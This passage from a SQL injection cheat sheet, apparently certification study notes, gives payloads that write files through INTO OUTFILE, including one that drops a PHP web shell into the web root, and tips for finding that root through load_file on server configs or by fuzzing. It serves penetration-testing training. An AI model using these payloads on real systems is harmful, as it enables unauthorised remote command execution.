gnarizard/cyberjutsu/_posts/CheatSheets/CPTS/2025-04-22-SQLi-Fundementals.md

 | `SELECT 'file written successfully!'
 INTO OUTFILE '/var/www/html/proof.txt'`                                                                         | Write a string into a server‑side file |
 | `cn' UNION SELECT '', '<?php system($_REQUEST[0]); ?>', '', '' INTO OUTFILE '/var/www/html/shell.php'-- -`                                            | Drop a PHP web shell into the web root |

+**Note:** To write a web shell, we must know the base web directory for the web server (i.e. web root).
+One way to find it is to use `load_file` to read the server configuration, like Apache's configuration found at `/etc/apache2/apache2.conf`, Nginx's configuration at `/etc/nginx/nginx.conf`, or IIS configuration at `%WinDir%\System32\Inetsrv\Config\ApplicationHost.config`, or we can search online for other possible configuration locations.
+Furthermore, we may run a fuzzing scan and try to write files to different possible web roots, using this [wordlist](https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/default-web-root-directory-linux.txt) for Linux or this [wordlist](https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/default-web-root-directory-windows.txt) for Windows.
+Finally, if none of the above works, we can use server errors displayed to us and try to find the web directory that way.

 ---